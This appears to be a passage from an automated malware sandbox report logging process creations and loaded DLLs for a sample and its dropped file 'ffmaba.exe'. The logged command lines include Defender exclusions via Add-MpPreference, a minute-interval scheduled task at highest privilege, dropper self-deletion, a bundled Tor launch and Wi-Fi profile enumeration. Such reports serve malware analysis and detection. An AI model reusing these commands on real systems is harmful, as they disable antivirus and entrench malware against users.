                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
                Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
